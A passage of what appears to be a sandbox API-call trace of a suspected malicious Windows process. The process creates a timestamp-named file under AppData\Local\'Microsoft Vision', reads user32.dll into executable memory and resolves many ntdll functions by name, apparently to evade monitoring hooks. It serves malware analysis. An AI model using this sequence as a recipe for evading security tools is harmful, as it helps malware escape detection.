Vision\\22-05-2022_13.27.02" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02" [0311.286] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.287] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision\\22-05-2022_13.27.02"), dwDesiredAccess=0x10000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0311.290] CloseHandle (hObject=0x358) returned 1 [0311.290] GetProcessHeap () returned 0x650000 [0311.290] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x400000) returned 0x41f1020 [0311.307] CreateFileA (lpFileName="c:\\windows\\system32\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0311.307] GetFileSize (in: hFile=0x358, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x146798 [0311.307] ReadFile (in: hFile=0x358, lpBuffer=0x41f1020, nNumberOfBytesToRead=0x146798, lpNumberOfBytesRead=0x41efe94, lpOverlapped=0x0 | out: lpBuffer=0x41f1020*, lpNumberOfBytesRead=0x41efe94*=0x146798, lpOverlapped=0x0) returned 1 [0311.604] CloseHandle (hObject=0x358) returned 1 [0311.604] VirtualAlloc (lpAddress=0x0, dwSize=0x147000, flAllocationType=0x3000, flProtect=0x40) returned 0x4600000 [0312.041] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="ntdll.dll" | out: Destination="ntdll.dll") returned 1 [0312.041] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x77760000) returned 0x0 [0312.041] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlRunDecodeUnicodeString" | out: DestinationString="RtlRunDecodeUnicodeString") [0312.041] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlRunDecodeUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7781f1a0) returned 0x0 [0312.041] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlReAllocateHeap" | out: DestinationString="RtlReAllocateHeap") [0312.041] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlReAllocateHeap", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7778efe0) returned 0x0 [0312.042] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlNtStatusToDosError" | out: DestinationString="RtlNtStatusToDosError") [0312.042] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlNtStatusToDosError", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777b83c0) returned 0x0 [0312.042] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CsrFreeCaptureBuffer" | out: DestinationString="CsrFreeCaptureBuffer") [0312.042] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="CsrFreeCaptureBuffer", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x778182d0) returned 0x0 [0312.042] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CsrClientCallServer" | out: DestinationString="CsrClientCallServer") [0312.042] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="CsrClientCallServer", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x778182c0) returned 0x0 [0312.042] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CsrAllocateMessagePointer" | out: DestinationString="CsrAllocateMessagePointer") [0312.042] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="CsrAllocateMessagePointer", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77818190) returned 0x0 [0312.042] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CsrAllocateCaptureBuffer" | out: DestinationString="CsrAllocateCaptureBuffer") [0312.042] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="CsrAllocateCaptureBuffer", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77818180) returned 0x0 [0312.043] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtOpenProcessToken" | out: DestinationString="NtOpenProcessToken") [0312.043] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtOpenProcessToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d7e10) returned 0x0 [0312.043] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtOpenThreadToken" | out: DestinationString="NtOpenThreadToken") [0312.043] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtOpenThreadToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6ee0) returned 0x0 [0312.043] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlFreeSid" | out: DestinationString="RtlFreeSid") [0312.043] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlFreeSid", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c6600) returned 0x0 [0312.043] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQueryInformationToken" | out: DestinationString="NtQueryInformationToken") [0312.043] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQueryInformationToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6eb0) returned 0x0 [0312.043] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlAllocateAndInitializeSid" | out: DestinationString="RtlAllocateAndInitializeSid") [0312.044] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlAllocateAndInitializeSid", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777bb3c0) returned 0x0 [0312.044] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlCompareUnicodeString" | out: DestinationString="RtlCompareUnicodeString") [0312.044] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlCompareUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777a13a0) returned 0x0 [0312.044] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="memmove" | out: DestinationString="memmove") [0312.044] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="memmove", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dcc90) returned 0x0 [0312.044] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtCallbackReturn" | out: DestinationString="NtCallbackReturn") [0312.044] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtCallbackReturn", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6cd0) returned 0x0 [0312.044] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlRetrieveNtUserPfn" | out: DestinationString="RtlRetrieveNtUserPfn") [0312.045] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlRetrieveNtUserPfn", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d8b20) returned 0x0 [0312.045] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlInitializeNtUserPfn" | out: DestinationString="RtlInitializeNtUserPfn") [0312.155] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlInitializeNtUserPfn", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d89d0) returned 0x0 [0312.155] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtProtectVirtualMemory" | out: DestinationString="NtProtectVirtualMemory") [0312.155] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtProtectVirtualMemory", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d71a0) returned 0x0 [0312.155] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_wcsicmp" | out: DestinationString="_wcsicmp") [0312.155] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_wcsicmp", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dbaa0) returned 0x0 [0312.155] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_stricmp" | out: DestinationString="_stricmp") [0312.156] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_stricmp", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777db580) returned 0x0 [0312.156] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlGetIntegerAtom" | out: DestinationString="RtlGetIntegerAtom") [0312.156] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlGetIntegerAtom", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777a8fe0) returned 0x0 [0312.156] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlDeleteCriticalSection" | out: DestinationString="RtlDeleteCriticalSection") [0312.156] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlDeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777b0e60) returned 0x0 [0312.156] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlResetNtUserPfn" | out: DestinationString="RtlResetNtUserPfn") [0312.156] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlResetNtUserPfn", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d8a90) returned 0x0 [0312.156] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlQueryElevationFlags" | out: DestinationString="RtlQueryElevationFlags") [0312.156] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlQueryElevationFlags", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777cb550) returned 0x0 [0312.157] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQuerySystemInformation" | out: DestinationString="NtQuerySystemInformation") [0312.157] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQuerySystemInformation", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d7000) returned 0x0 [0312.157] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlInitializeCriticalSection" | out: DestinationString="RtlInitializeCriticalSection") [0312.157] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlInitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777ba200) returned 0x0 [0312.157] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlUnicodeToMultiByteSize" | out: DestinationString="RtlUnicodeToMultiByteSize") [0312.157] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlUnicodeToMultiByteSize", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c7820) returned 0x0 [0312.157] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlIsThreadWithinLoaderCallout" | out: DestinationString="RtlIsThreadWithinLoaderCallout") [0312.157] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlIsThreadWithinLoaderCallout", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777cb640) returned 0x0 [0312.157] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtYieldExecution" | out: DestinationString="NtYieldExecution") [0312.158] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtYieldExecution", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d7100) returned 0x0 [0312.158] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlQueryInformationActiveActivationContext" | out: DestinationString="RtlQueryInformationActiveActivationContext") [0312.158] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlQueryInformationActiveActivationContext", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c9710) returned 0x0 [0312.158] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtDeleteValueKey" | out: DestinationString="NtDeleteValueKey") [0312.158] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtDeleteValueKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d7930) returned 0x0 [0312.158] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlRunEncodeUnicodeString" | out: DestinationString="RtlRunEncodeUnicodeString") [0312.158] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlRunEncodeUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7781f1f0) returned 0x0 [0312.158] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtCreateKey" | out: DestinationString="NtCreateKey") [0312.159] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtCreateKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6e70) returned 0x0 [0312.159] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcstoul" | out: DestinationString="wcstoul") [0312.159] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcstoul", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777ded70) returned 0x0 [0312.159] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtVdmControl" | out: DestinationString="NtVdmControl") [0312.159] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtVdmControl", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d87f0) returned 0x0 [0312.159] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlAnsiStringToUnicodeString" | out: DestinationString="RtlAnsiStringToUnicodeString") [0312.159] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlAnsiStringToUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77798180) returned 0x0 [0312.159] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlInitAnsiString" | out: DestinationString="RtlInitAnsiString") [0312.160] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlInitAnsiString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d9060) returned 0x0 [0312.160] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlFreeUnicodeString" | out: DestinationString="RtlFreeUnicodeString") [0312.160] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlFreeUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77790200) returned 0x0 [0312.160] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlGetThreadLangIdByIndex" | out: DestinationString="RtlGetThreadLangIdByIndex") [0312.160] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlGetThreadLangIdByIndex", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77827ab0) returned 0x0 [0312.160] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtOpenDirectoryObject" | out: DestinationString="NtOpenDirectoryObject") [0312.160] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtOpenDirectoryObject", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d7220) returned 0x0 [0312.160] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtSetSecurityObject" | out: DestinationString="NtSetSecurityObject") [0312.161] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtSetSecurityObject", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d8580) returned 0x0 [0312.161] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQuerySecurityObject" | out: DestinationString="NtQuerySecurityObject") [0312.161] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQuerySecurityObject", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d80f0) returned 0x0 [0312.161] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQueryInformationProcess" | out: DestinationString="NtQueryInformationProcess") [0312.161] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQueryInformationProcess", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6e10) returned 0x0 [0312.161] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcstol" | out: DestinationString="wcstol") [0312.161] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcstol", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777ded20) returned 0x0 [0312.161] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_vsnwprintf" | out: DestinationString="_vsnwprintf") [0312.162] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777db9a0) returned 0x0 [0312.162] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlReleaseActivationContext" | out: DestinationString="RtlReleaseActivationContext") [0312.162] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlReleaseActivationContext", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777af2b0) returned 0x0 [0312.162] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlFindActivationContextSectionString" | out: DestinationString="RtlFindActivationContextSectionString") [0312.162] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlFindActivationContextSectionString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77799a60) returned 0x0 [0312.162] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlDeactivateActivationContextUnsafeFast" | out: DestinationString="RtlDeactivateActivationContextUnsafeFast") [0312.162] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlDeactivateActivationContextUnsafeFast", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77798540) returned 0x0 [0312.162] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlActivateActivationContextUnsafeFast" | out: DestinationString="RtlActivateActivationContextUnsafeFast") [0312.163] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlActivateActivationContextUnsafeFast", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7779ad60) returned 0x0 [0312.163] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlUnicodeToMultiByteN" | out: DestinationString="RtlUnicodeToMultiByteN") [0312.163] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlUnicodeToMultiByteN", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777bb180) returned 0x0 [0312.163] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlMultiByteToUnicodeN" | out: DestinationString="RtlMultiByteToUnicodeN") [0312.163] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlMultiByteToUnicodeN", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777982b0) returned 0x0 [0312.163] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlEnterCriticalSection" | out: DestinationString="RtlEnterCriticalSection") [0312.163] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlEnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7779f290) returned 0x0 [0312.163] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlLeaveCriticalSection" | out: DestinationString="RtlLeaveCriticalSection") [0312.164] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlLeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7779f210) returned 0x0 [0312.164] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcscat_s" | out: DestinationString="wcscat_s") [0312.164] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcscat_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777e4700) returned 0x0 [0312.164] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcscpy_s" | out: DestinationString="wcscpy_s") [0312.164] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcscpy_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777e4790) returned 0x0 [0312.164] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQueryWnfStateData" | out: DestinationString="NtQueryWnfStateData") [0312.164] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQueryWnfStateData", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d8160) returned 0x0 [0312.164] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlNtStatusToDosErrorNoTeb" | out: DestinationString="RtlNtStatusToDosErrorNoTeb") [0312.164] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlNtStatusToDosErrorNoTeb", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c3ec0) returned 0x0 [0312.164] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtUpdateWnfStateData" | out: DestinationString="NtUpdateWnfStateData") [0312.165] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtUpdateWnfStateData", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d87e0) returned 0x0 [0312.165] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQuerySecurityAttributesToken" | out: DestinationString="NtQuerySecurityAttributesToken") [0312.165] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQuerySecurityAttributesToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d80e0) returned 0x0 [0312.165] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlCompareUnicodeStrings" | out: DestinationString="RtlCompareUnicodeStrings") [0312.165] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlCompareUnicodeStrings", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7779feb0) returned 0x0 [0312.165] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlEqualUnicodeString" | out: DestinationString="RtlEqualUnicodeString") [0312.165] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlEqualUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7779b470) returned 0x0 [0312.165] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtSetInformationToken" | out: DestinationString="NtSetInformationToken") [0312.166] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtSetInformationToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d84c0) returned 0x0 [0312.166] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlCopyUnicodeString" | out: DestinationString="RtlCopyUnicodeString") [0312.166] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlCopyUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777a0f70) returned 0x0 [0312.166] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlValidSid" | out: DestinationString="RtlValidSid") [0312.166] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlValidSid", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777a0e70) returned 0x0 [0312.166] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlIsNameLegalDOS8Dot3" | out: DestinationString="RtlIsNameLegalDOS8Dot3") [0312.166] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlIsNameLegalDOS8Dot3", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77832ac0) returned 0x0 [0312.167] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtQueryValueKey" | out: DestinationString="NtQueryValueKey") [0312.167] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtQueryValueKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6df0) returned 0x0 [0312.167] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtEnumerateKey" | out: DestinationString="NtEnumerateKey") [0312.167] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtEnumerateKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6fc0) returned 0x0 [0312.167] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcsncat_s" | out: DestinationString="wcsncat_s") [0312.167] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcsncat_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777e4810) returned 0x0 [0312.167] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtClose" | out: DestinationString="NtClose") [0312.168] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtClose", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6d70) returned 0x0 [0312.168] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtRaiseHardError" | out: DestinationString="NtRaiseHardError") [0312.168] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtRaiseHardError", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d81a0) returned 0x0 [0312.168] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlSizeHeap" | out: DestinationString="RtlSizeHeap") [0312.168] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlSizeHeap", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7778bb20) returned 0x0 [0312.168] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LdrFlushAlternateResourceModules" | out: DestinationString="LdrFlushAlternateResourceModules") [0312.168] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="LdrFlushAlternateResourceModules", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77818b20) returned 0x0 [0312.168] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlMultiByteToUnicodeSize" | out: DestinationString="RtlMultiByteToUnicodeSize") [0312.168] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlMultiByteToUnicodeSize", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777828d0) returned 0x0 [0312.168] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtPowerInformation" | out: DestinationString="NtPowerInformation") [0312.169] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtPowerInformation", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d7290) returned 0x0 [0312.169] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="qsort" | out: DestinationString="qsort") [0312.169] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="qsort", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dd050) returned 0x0 [0312.169] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="iswspace" | out: DestinationString="iswspace") [0312.169] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="iswspace", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dc710) returned 0x0 [0312.169] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcsncpy_s" | out: DestinationString="wcsncpy_s") [0312.169] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcsncpy_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: 